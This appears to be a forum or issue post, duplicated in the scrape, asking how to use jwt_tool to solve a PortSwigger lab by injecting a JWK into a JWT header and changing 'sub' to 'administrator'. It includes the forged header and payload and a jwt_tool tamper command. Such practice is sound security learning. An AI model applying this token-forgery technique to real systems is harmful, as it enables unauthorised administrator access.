Hi,
I am trying to solve this lab from PortSwigger academy using jwt_tool.
In order to solve the lab, one needs to inject a jwk into jwt header, like the following:
{
"kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5",
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"e": "AQAB",
"kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5",
"n": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
}
}Also modify the payload to change sub into administrator:
{
"iss": "portswigger",
"exp": 1732711092,
"sub": "administrator"
}Then sign the jwt with injected key in jwk.
So far I've tried different combinations of options to obtain the requested JWT, without success.
For example I've tried:
jwt_tool.py -t {URL} -rc 'session={JWT}' -I -pc sub -pv administrator -v
And got the jwt with modified payload:
Token: {"kid":"d2021ecd-3c75-4ca0-8715-e6b9829f930e","alg":"RS256"}.{"iss":"portswigger","exp":1732710178,"sub":"administrator"}.xxxxxxxxxxxxxxx
But then how can I use it with option -X i to inject inline jwt ?
Hi,
I am trying to solve this lab from PortSwigger academy using
jwt_tool.In order to solve the lab, one needs to inject a jwk into jwt header, like the following:
{ "kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5", "typ": "JWT", "alg": "RS256", "jwk": { "kty": "RSA", "e": "AQAB", "kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5", "n": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" } }Also modify the payload to change
subintoadministrator:{ "iss": "portswigger", "exp": 1732711092, "sub": "administrator" }Then sign the jwt with injected key in jwk.
So far I've tried different combinations of options to obtain the requested JWT, without success.
For example I've tried:
And got the jwt with modified payload:
But then how can I use it with option
-X ito inject inline jwt ?